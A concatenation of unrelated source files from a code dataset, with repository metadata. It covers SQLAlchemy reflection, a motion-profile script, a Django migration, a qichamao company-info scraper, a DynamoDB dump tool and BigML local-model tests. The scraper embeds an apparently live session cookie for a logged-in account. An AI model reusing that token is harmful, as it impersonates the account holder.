flavor = index_d.get('type', 'unknown type')
if include_columns and \
not set(columns).issubset(include_columns):
util.warn(
"Omitting %s KEY for (%s), key covers omitted columns." %
(flavor, ', '.join(columns)))
continue
sa_schema.Index(name, *[table.columns[c] for c in columns],
**dict(unique=unique))
| [
"[email protected]"
] | |
5ea6dac2e1e68ac62b2b84dc089bade38e2b1911 | 4e135c9d35a033c8f9f5c70e57ae27f61b4f34fb | /19_Sympact/Python/sympact.py | cc5b733f58860962724032b8ef0ef8b107763984 | [] | no_license | xpessoles/TP_Documents_PSI | a95b57eebd32a3641a02623e01cd3ab32f3155c2 | 76bd77fed5a88337e7669c8ca01944020de47458 | refs/heads/master | 2023-08-23T21:15:23.205881 | 2023-08-15T06:15:29 | 2023-08-15T06:15:29 | 168,961,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,417 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 21 07:27:14 2022
@author: xpess
"""
import numpy as np
import matplotlib.pyplot as plt
def trapeze(les_t:list,t1:float,t2:float,amax:float,vmax:float)->list :
"""
Détermination des loi horaires en trapèze
Parameters
----------
les_t : list
DESCRIPTION.
t1 : float
temps d'accélération.
t2 : float
temps d'accélération + vitesse constante
amax : float
DESCRIPTION.
vmax : float
DESCRIPTION.
Returns
-------
list
DESCRIPTION.
"""
les_pos = []
les_vit = []
les_acc = []
x1,v1 = 0,0
x2,v2 = 0,0
for t in les_t :
if t<t1 :
les_pos.append(0.5*amax*t*t)
les_vit.append(amax*t)
les_acc.append(amax)
x1,v1,t11 = les_pos[-1], les_vit[-1],t
elif t>=t1 and t<t2 :
les_pos.append(v1*(t-t11)+x1)
les_vit.append(v1)
les_acc.append(0)
x2,v2,t22 = les_pos[-1], les_vit[-1],t
elif t>=t2 and t<=t1+t2 :
les_pos.append(-0.5*amax*(t-t22)**2+v2*(t-t22)+x2)
les_vit.append(v2-amax*(t-t22))
les_acc.append(-amax)
else :
les_pos.append(les_pos[-1])
les_vit.append(0)
les_acc.append(0)
return np.array(les_pos),np.array(les_vit),np.array(les_acc)
def plot_pva(les_t,les_pos,les_vit,les_acc):
plt.plot(les_t,les_pos)
plt.plot(les_t,les_vit)
plt.plot(les_t,les_acc)
plt.grid()
plt.show()
def loi_ES(les_theta,R,H):
les_phi = np.arctan2(H+R*np.sin(les_theta),R*np.cos(les_theta))
return les_phi
def deriv(les_t,les_x):
les_v = []
for i in range(len(les_t)-1):
les_v.append((les_x[i+1]-les_x[i])/(les_t[i+1]-les_t[i]))
les_v.append(les_v[-1])
return np.array(les_v)
J1 = 188939e-9 # kgm2
J2 = 2233294973e-9 # kgm2
t1 = .1645 #
t2 = t1+0.671
theta_0 = -np.radians(30.61)
vmax = 4.93 # rad/s
amax = 30 # rad/s²
R,H = 0.081,0.112 # A modifier
les_t = np.linspace(0,t1+t2+t1,12000) # On rajoute +t1 pour avoir des points en plus...
les_pos,les_vit,les_acc = trapeze(les_t, t1, t2, amax, vmax)
# Calcul des positions
les_theta = les_pos + theta_0
les_phi = loi_ES(les_theta,R,H)
plt.plot(les_t,np.degrees(les_theta))
plt.plot(les_t,np.degrees(les_phi))
# Calcul des vitesses
les_thetap = deriv(les_t,les_theta)
les_phip = deriv(les_t,les_phi)
plt.figure()
plt.plot(les_t,les_thetap)
plt.plot(les_t,les_phip)
# Calcul des accélerations
les_thetapp = deriv(les_t,les_thetap)
les_phipp = deriv(les_t,les_phip)
plt.figure()
plt.plot(les_t,les_thetapp)
plt.plot(les_t,les_phipp)
# les_theta = les_pos
# les_phi = loi_ES(les_theta,R,H)
# les_thetap = deriv(les_t,les_theta)
# les_phip = deriv(les_t,les_phi)
# les_thetapp = deriv(les_t[:-1],les_thetap)
# les_phipp = deriv(les_t[:-1],les_phi)
# plt.plot(les_theta,label='Entrée')
# plt.plot(les_phi,label='Sortie')
# plt.legend()
Mu,M,g = 0.5,5,9.81
alpha =np.radians(45)
deb,fin = 1,1000
Cm = (J2*les_thetap*les_thetapp+J1*les_phip*les_phipp+Mu*M*g*np.cos(les_phi-alpha)*les_thetap)/les_thetap
plt.plot(les_t,Mu*M*g*np.cos(les_phi-alpha))
#Cm = (J2*les_thetap[deb:fin]*les_thetapp[deb:fin]+J1*les_phip[deb:fin]*les_phipp[deb:fin])/les_thetap[deb:fin]
plt.figure()
plt.plot(les_t,Cm)
# # ENTREE : THETA
# # SORTIE : PHI | [
"[email protected]"
] | |
b34cc4a6c6bb510a6cb526348b14851f8cf7b341 | 27c9b374a75550252ddfe5da400fad891c6de590 | /chars/monster_scripts/MonsterAudio.py | d92db631a6f408a33e87967e694889278c5eabfa | [] | no_license | Dynamique-Zak/Zelda_BlenderGame | 03065416939deb3ce18007909ccc278c736baad0 | 0f5d5d15bfa79e9f8ea15f0ebcb76bce92f77a21 | refs/heads/master | 2016-08-13T00:12:34.746520 | 2016-02-19T23:18:27 | 2016-02-19T23:18:27 | 49,572,402 | 30 | 16 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | import aud
# load sound device
device = aud.device()
class MonsterAudio:
def __init__(self):
self.lastStepFrame = 0
def playStepSound(self, current_frame, frames, audio):
for frame in frames:
r = range(frame-1, frame+1)
if ( (current_frame >= frame and current_frame <= frame+1) and self.lastStepFrame != frame):
self.lastStepFrame = frame
device.play(audio)
| [
"[email protected]"
] | |
b4114f55a3b44215c32b9f099140ad31264d5e11 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/simple-cipher/85118e8764e3424d97f4175fe0cad1fd.py | 28007cdd0fefc6a8857a63ff19f4b2b3418fd3e8 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,923 | py | # cgi path
# William Morris
# exercism.io
# cipher.py
import random
class Caesar:
def __init__(self):
self.key = 'd'
def encode(self,phrase):
encoded_phrase = ''
for letter in phrase:
if letter.isalpha():
encoded_phrase += _shift(letter.lower(),self.key,1)
return encoded_phrase
def decode(self,phrase):
decoded_phrase = ''
for letter in phrase:
if letter.isalpha():
decoded_phrase += _shift(letter.lower(),self.key,-1)
return decoded_phrase
class Cipher:
def __init__(self, key = None):
if key:
self.key = key
else:
self.key = ''.join([chr(random.randint(97,122)) for i in range(100)])
def encode(self,phrase):
keylist = list(self.key)
phrase = list(phrase)
while len(keylist) < len(phrase):
keylist += keylist
encoded_phrase = ''
for letter,key in zip(phrase,keylist):
if letter.isalpha():
encoded_phrase +=_shift(letter,key,1)
return encoded_phrase
def decode(self,phrase):
keylist = list(self.key)
while len(keylist) < len(phrase):
keylist += keylist
decoded_phrase = ''
for letter,key in zip(phrase,keylist):
if letter.isalpha():
decoded_phrase +=_shift(letter,key,-1)
return decoded_phrase
def _shift(letter,key,sign):
'''letter and key must be lower case, sign must be 1 (for encode)
or -1 (for decode)'''
shift = ord(key)-97
letter_ascii = ord(letter)
letter_ascii += sign*shift
while letter_ascii < 97 or letter_ascii > 122:
letter_ascii -= sign*26
return chr(letter_ascii)
| [
"[email protected]"
] | |
2d6be584dbe664f1c96da1731febcec3c8fc88fb | 2481cde6506743565dff2b405a2396daf208ab3e | /src/notification/migrations/0026_notificationmessage_sender.py | 567ce2e804646575b24a3ee33b7668cbd7a59bdb | [
"Apache-2.0"
] | permissive | aropan/clist | 4819a3036d179595e4df8c646aff2ed593b9dad3 | 5c805b2af71acee97f993f19d8d4e229f7f5b411 | refs/heads/master | 2023-08-31T11:15:17.987776 | 2023-08-27T21:51:14 | 2023-08-27T21:52:16 | 187,111,853 | 276 | 35 | Apache-2.0 | 2023-09-06T18:42:53 | 2019-05-16T22:57:03 | Python | UTF-8 | Python | false | false | 593 | py | # Generated by Django 3.1.14 on 2022-01-17 00:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('true_coders', '0048_auto_20220111_2315'),
('notification', '0025_auto_20220111_2315'),
]
operations = [
migrations.AddField(
model_name='notificationmessage',
name='sender',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sender_set', to='true_coders.coder'),
),
]
| [
"[email protected]"
] | |
b8aafb5b60e806817d8bb6084aae738c01bfca0b | 22b1ca0d3e93c10356a95aa4377a798e3615bcc3 | /djoauth/djoauth/urls.py | 7566acb7c068796cad8ba9fafab4d105db12ece4 | [] | no_license | xtornasol512/djoauth | b99142640356d454a738a5047a315449d3a5315a | dede596ecc0fee3010f331b01975b5cb51c122dd | refs/heads/master | 2020-04-09T14:43:15.017259 | 2018-12-04T20:37:31 | 2018-12-04T20:37:31 | 160,405,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | """djoauth URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from home.views import simple_view, terms
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^accounts/', include('allauth.urls')),
url(r'^$', simple_view, name="simple_view"),
url(r'^terms$', terms, name="terms"),
]
| [
"[email protected]"
] | |
3afd9866a37000da97a5bae4e35cf4934ba1a2ad | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/qichamao_cmpInfo_20210203092107.py | f91c112ba48f192dce00f481f0f2d683966be121 | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,230 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : qichamao_cmpInfo.py
@Time : 2021/02/03 09:17:24
@Author : Jiajun Chen
@Version : 1.0
@Contact : [email protected]
@License : (C)Copyright 2017-2018, Liugroup-NLPR-CASIA
'''
import requests
from bs4 import BeautifulSoup
import time
import csv
import pandas as pd
import numpy as np
# login = {'user':'13710149700',
# 'password':'123456'}
# 使用的网站是企查查
base_url = 'https://www.qichamao.com'
# requests.post('https://www.qichamao.com',data=login,headers=afterLogin_headers)
# 需要在浏览器上登录企查猫账户,并将cookie文件添加在此
afterLogin_headers = {'Cookie':'qznewsite.uid=y4eseo3a1q4xbrwimor3o5tm; qz.newsite=6C61702DD95709F9EE190BD7CCB7B62C97136BAC307B6F0B818EC0A943307DAB61627F0AC6CD818268C10D121B37F840C1EF255513480EC3012A7707443FE523DD7FF79A7F3058E5E7FB5CF3FE3544235D5313C4816B54C0CDB254F24D8ED5235B722BCBB23BE62B19A2370E7F0951CD92A731FE66C208D1BE78AA64758629806772055F7210C67D442DE7ABBE138EF387E6258291F8FBF85DFF6C785E362E2903705A0963369284E8652A61531293304D67EBB8D28775FBC7D7EBF16AC3CCA96F5A5D17; Hm_lvt_55ad112b0079dd9ab00429af7113d5e3=1611805092,1612262918; Hm_lpvt_55ad112b0079dd9ab00429af7113d5e3=1612262927',
'Referer':'https://www.qichamao.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_compInfo(comp):
# 输入公司名称,返回公司基本公司信息
r = requests.get('{}/search/all/{}'.format(base_url,comp),headers=afterLogin_headers)
r.raise_for_status()
r.encoding = 'utf-8' #linux utf-8
soup = BeautifulSoup(r.text,features="html.parser")
url = base_url + soup.find(attrs={'class':'listsec_con'}).a['href']
# soup.find(attrs={'class':'listsec_con'})
time.sleep(5)
rs = requests.get(url,headers=afterLogin_headers)
rs.encoding='utf-8'
soup2 = BeautifulSoup(rs.text,'html.parser')
info = soup2.find(attrs={'class':'qd-table-body li-half f14'}).findAll('div')
info = [i.get_text().strip() for i in info]
compinfo = {'法定代表人':info[0],
'纳税人识别号':info[1],
'名称':info[2],
'机构代码':info[3],
'注册号':info[4],
'注册资本':info[5],
'统一社会信用代码':info[6],
'登记机关':info[7],
'经营状态':info[8],
'成立日期':info[9],
'企业类型':info[10],
'经营期限':info[11],
'所属地区':info[12],
'核准时间':info[13],
'企业地址':info[14],
'经营范围':info[15]}
return compinfo
if __name__ == '__main__':
import pickle
with open('./saved_config/zb_zxb_stocksInfo.pkl', 'rb') as file:
all_data = pickle.load(file)
j =0
for i, (k, v) in enumerate(all_data.items()):
if v['统一社会信用代码'] == '':
try:
compinfo = get_compInfo(v['机构名称'])
print('成功获得 ',compinfo['名称'])
v['统一社会信用代码'] = compinfo['统一社会信用代码']
v['经营范围'] = compinfo['经营范围']
except:
print("需要验证码更新")
wait = input("Press Enter to continue.")
compinfo = get_compInfo(v['机构名称'])
v['统一社会信用代码'] = compinfo['统一社会信用代码']
v['经营范围'] = compinfo['经营范围']
else:
j+=1
time.sleep(3)
else:
continue
if j > 60:
break
with open('./saved_config/zb_zxb_stocksInfo.pkl', 'wb') as file:
pickle.dump(all_data,file, pickle.HIGHEST_PROTOCOL)
# your stuff
# df = pd.read_excel('C:/Users/chen/Desktop/IPO_info/P020210122657813200711.xls',skipfooter=1,skiprows=2,index_col='序号',keep_default_na=False,encoding='utf-8',sheet_name=0)
# comp1 = df[' 企业名称'].values
# df2 = pd.read_excel('C:/Users/chen/Desktop/IPO_info/P020210122657813200711.xls',skipfooter=1,skiprows=2,index_col='序号',keep_default_na=False,encoding='utf-8',sheet_name=1)
# comp2 = df2[' 企业名称'].values
# compList =np.append(comp1,comp2)
# # for i in compList:
# # compinfo = get_compInfo(i)
# # csv_columns = ['法定代表人','纳税人识别号','名称','机构代码','注册号','注册资本','统一社会信用代码','登记机关',\
# # '经营状态','成立日期','企业类型','经营期限','所属地区','核准时间','企业地址','经营范围']
# # csv_file = "credit.csv"
# # try:
# # with open(csv_file, 'a+') as csvfile:
# # writer = csv.DictWriter(csvfile, fieldnames=csv_columns)
# # writer.writeheader()
# # writer.writerow(compinfo)
# # except IOError:
# # print("I/O error")
# try:
# with open('C:/Users/chen/Desktop/IPO_info/csrc_dict.pkl', 'rb') as file:
# csrc_dict = pickle.load(file)
# except:
# csrc_dict = {}
# count = 0
# for i in compList:
# count +=1
# i = i.replace(r'*','')
# if i in data:
# if i in csrc_dict and i['统一社会信用代码'] != '':
# continue
# try:
# compinfo = get_compInfo(i)
# data[i]['统一社会信用代码'] = compinfo['统一社会信用代码']
# data[i]['经营范围'] = compinfo['经营范围']
# csrc_dict.update(data[i])
# except:
# print('cannot use anymore')
# else:
# print('cannot found value: ',i)
# if count % 20 == 0:
# time.sleep(60)
# with open('C:/Users/chen/Desktop/IPO_info/csrc.pkl', 'rb') as file:
# pickle.dump(csrc_dict, file, pickle.HIGHEST_PROTOCOL) | [
"[email protected]"
] | |
b4ccb64fb9f5a2c0c23bf3b386d43e9fbc4568bd | 01a085bb89225d0390316036a915b2b8d7403219 | /bin/dynamodb_dump | 8550b8bc85167f6177c7a589e20cdfa1b46810ab | [] | no_license | vipinsachdeva/elasticluster_full | 0199ee00e716f285173c8974fdf9570ab5d43470 | 71160196682a8d18a9547d5d28e8a885b067924d | refs/heads/master | 2021-05-15T11:35:44.706476 | 2017-10-25T22:37:37 | 2017-10-25T22:37:37 | 108,333,786 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | #!/home/vsachde/elasticluster/bin/python
import argparse
import errno
import os
import boto
from boto.compat import json
from boto.compat import six
DESCRIPTION = """Dump the contents of one or more DynamoDB tables to the local filesystem.
Each table is dumped into two files:
- {table_name}.metadata stores the table's name, schema and provisioned
throughput.
- {table_name}.data stores the table's actual contents.
Both files are created in the current directory. To write them somewhere else,
use the --out-dir parameter (the target directory will be created if needed).
"""
def dump_table(table, out_dir):
metadata_file = os.path.join(out_dir, "%s.metadata" % table.name)
data_file = os.path.join(out_dir, "%s.data" % table.name)
with open(metadata_file, "w") as metadata_fd:
json.dump(
{
"name": table.name,
"schema": table.schema.dict,
"read_units": table.read_units,
"write_units": table.write_units,
},
metadata_fd
)
with open(data_file, "w") as data_fd:
for item in table.scan():
# JSON can't serialize sets -- convert those to lists.
data = {}
for k, v in six.iteritems(item):
if isinstance(v, (set, frozenset)):
data[k] = list(v)
else:
data[k] = v
data_fd.write(json.dumps(data))
data_fd.write("\n")
def dynamodb_dump(tables, out_dir):
try:
os.makedirs(out_dir)
except OSError as e:
# We don't care if the dir already exists.
if e.errno != errno.EEXIST:
raise
conn = boto.connect_dynamodb()
for t in tables:
dump_table(conn.get_table(t), out_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
prog="dynamodb_dump",
description=DESCRIPTION
)
parser.add_argument("--out-dir", default=".")
parser.add_argument("tables", metavar="TABLES", nargs="+")
namespace = parser.parse_args()
dynamodb_dump(namespace.tables, namespace.out_dir)
| [
"vipin@kryptonite"
] | vipin@kryptonite |
|
d3930fcd5569ff795869cbce29d26dee4a4a1439 | e00052a9c36f72e5b50ab0605fbd47f956f3d44f | /bigml/tests/test_40_local_from_file.py | cf221e7ad822415b9ed180a2f8e9fae2615dcfe1 | [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] | permissive | Bakage1016/python | e0e97541732af1c3a22c29b9e1fe982c46a41521 | d844258dbf43d5ae285fee793765aae95866ca58 | refs/heads/master | 2023-02-05T14:28:07.933696 | 2020-12-22T18:57:32 | 2020-12-22T18:57:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,488 | py | # -*- coding: utf-8 -*-
#
# Copyright 2018-2020 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Creating tests for building local models from files
"""
from .world import world, setup_module, teardown_module
from . import create_model_steps as model_create
from . import create_linear_steps as linear_create
from . import create_source_steps as source_create
from . import create_dataset_steps as dataset_create
from . import create_ensemble_steps as ensemble_create
from . import create_anomaly_steps as anomaly_create
from . import create_time_series_steps as timeseries_create
from . import create_association_steps as association_create
from . import create_cluster_steps as cluster_create
from . import create_lda_steps as topic_create
from . import compare_predictions_steps as prediction_compare
class TestLocalFromFile(object):
def setup(self):
"""
Debug information
"""
print("\n-------------------\nTests in: %s\n" % __name__)
def teardown(self):
"""
Debug information
"""
print("\nEnd of tests in: %s\n-------------------\n" % __name__)
def test_scenario1(self):
"""
Scenario 1: Successfully creating a local model from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a model
And I wait until the model is ready less than <time_3> secs
And I export the "<pmml>" model to "<exported_file>"
When I create a local model from the file "<exported_file>"
Then the model ID and the local model ID match
Examples:
| data | time_1 | time_2 | time_3 | pmml | exported_file
| ../data/iris.csv | 10 | 10 | 10 | False | ./tmp/model.json
"""
print(self.test_scenario1.__doc__)
examples = [
['data/iris.csv', '10', '10', '10', False, './tmp/model.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_model(self)
model_create.the_model_is_finished_in_less_than(self, example[3])
model_create.i_export_model(self, example[4], example[5])
model_create.i_create_local_model_from_file(self, example[5])
model_create.check_model_id_local_id(self)
def test_scenario2(self):
"""
Scenario 2: Successfully creating a local ensemble from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create an ensemble
And I wait until the ensemble is ready less than <time_3> secs
And I export the ensemble to "<exported_file>"
When I create a local ensemble from the file "<exported_file>"
Then the ensemble ID and the local ensemble ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/ensemble.json
"""
print(self.test_scenario2.__doc__)
examples = [
['data/iris.csv', '10', '10', '50', './tmp/ensemble.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
ensemble_create.i_create_an_ensemble(self)
ensemble_create.the_ensemble_is_finished_in_less_than(self, example[3])
ensemble_create.i_export_ensemble(self, example[4])
ensemble_create.i_create_local_ensemble_from_file(self, example[4])
ensemble_create.check_ensemble_id_local_id(self)
def test_scenario3(self):
"""
Scenario 3: Successfully creating a local logistic regression from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a logistic regression
And I wait until the logistic regression is ready less than <time_3> secs
And I export the logistic regression to "<exported_file>"
When I create a local logistic regression from the file "<exported_file>"
Then the logistic regression ID and the local logistic regression ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/logistic.json
"""
print(self.test_scenario3.__doc__)
examples = [
['data/iris.csv', '10', '10', '50', './tmp/logistic.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_logistic_model(self)
model_create.the_logistic_model_is_finished_in_less_than(self, example[3])
model_create.i_export_logistic_regression(self, example[4])
model_create.i_create_local_logistic_regression_from_file(self, example[4])
model_create.check_logistic_regression_id_local_id(self)
def test_scenario4(self):
"""
Scenario 4: Successfully creating a local deepnet from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a deepnet
And I wait until the deepnet is ready less than <time_3> secs
And I export the deepnet to "<exported_file>"
When I create a local deepnet from the file "<exported_file>"
Then the deepnet ID and the local deepnet ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/deepnet.json
"""
print(self.test_scenario4.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/deepnet.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_deepnet(self)
model_create.the_deepnet_is_finished_in_less_than(self, example[3])
model_create.i_export_deepnet(self, example[4])
model_create.i_create_local_deepnet_from_file(self, example[4])
model_create.check_deepnet_id_local_id(self)
def test_scenario5(self):
"""
Scenario 5: Successfully creating a local cluster from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a cluster
And I wait until the cluster is ready less than <time_3> secs
And I export the cluster to "<exported_file>"
When I create a local cluster from the file "<exported_file>"
Then the cluster ID and the local cluster ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/cluster.json
"""
print(self.test_scenario5.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/cluster.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
cluster_create.i_create_a_cluster(self)
cluster_create.the_cluster_is_finished_in_less_than(self, example[3])
cluster_create.i_export_cluster(self, example[4])
cluster_create.i_create_local_cluster_from_file(self, example[4])
cluster_create.check_cluster_id_local_id(self)
def test_scenario6(self):
"""
Scenario 6: Successfully creating a local anomaly from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create an anomaly
And I wait until the anomaly is ready less than <time_3> secs
And I export the anomaly to "<exported_file>"
When I create a local anomaly from the file "<exported_file>"
Then the anomaly ID and the local anomaly ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/anomaly.json
"""
print(self.test_scenario6.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/anomaly.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
anomaly_create.i_create_an_anomaly(self)
anomaly_create.the_anomaly_is_finished_in_less_than(self, example[3])
anomaly_create.i_export_anomaly(self, example[4])
anomaly_create.i_create_local_anomaly_from_file(self, example[4])
anomaly_create.check_anomaly_id_local_id(self)
def test_scenario7(self):
"""
Scenario 7: Successfully creating a local association from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create an association
And I wait until the association is ready less than <time_3> secs
And I export the association to "<exported_file>"
When I create a local association from the file "<exported_file>"
Then the association ID and the local association ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/association.json
"""
print(self.test_scenario7.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/association.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
association_create.i_create_an_association_from_dataset(self)
association_create.the_association_is_finished_in_less_than(self, example[3])
association_create.i_export_association(self, example[4])
association_create.i_create_local_association_from_file(self, example[4])
association_create.check_association_id_local_id(self)
def test_scenario8(self):
"""
Scenario 8: Successfully creating a local topic model from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a topic model
And I wait until the topic model is ready less than <time_3> secs
And I export the topic model to "<exported_file>"
When I create a local topic model from the file "<exported_file>"
Then the topic model ID and the local topic model ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/topic_model.json
"""
print(self.test_scenario8.__doc__)
examples = [
['data/spam.csv', '10', '10', '500', './tmp/topic_model.json', '{"fields": {"000001": {"optype": "text", "term_analysis": {"case_sensitive": true, "stem_words": true, "use_stopwords": false, "language": "en"}}}}']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
source_create.i_update_source_with(self, example[5])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
topic_create.i_create_a_topic_model(self)
topic_create.the_topic_model_is_finished_in_less_than(self, example[3])
topic_create.i_export_topic_model(self, example[4])
topic_create.i_create_local_topic_model_from_file(self, example[4])
topic_create.check_topic_model_id_local_id(self)
def test_scenario9(self):
"""
Scenario 9: Successfully creating a local association from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a time series
And I wait until the time series is ready less than <time_3> secs
And I export the time series to "<exported_file>"
When I create a local time series from the file "<exported_file>"
Then the time series ID and the local time series ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/time_series.json
"""
print(self.test_scenario9.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/time_series.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
timeseries_create.i_create_a_time_series(self)
timeseries_create.the_time_series_is_finished_in_less_than(self, example[3])
timeseries_create.i_export_time_series(self, example[4])
timeseries_create.i_create_local_time_series_from_file(self, example[4])
timeseries_create.check_time_series_id_local_id(self)
def test_scenario10(self):
"""
Scenario 10: Successfully creating a local fusion from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a model with "<params>"
And I wait until the model is ready less than <time_3> secs
And I create a model with "<params>"
And I wait until the model is ready less than <time_3> secs
And I create a model with "<params>"
And I wait until the model is ready less than <time_3> secs
And I retrieve a list of remote models tagged with "<tag>"
And I create a fusion from a list of models
And I wait until the fusion is ready less than <time_3> secs
And I export the fusion to "<exported_file>"
When I create a local fusion from the file "<exported_file>"
Then the fusion ID and the local fusion ID match
Examples:
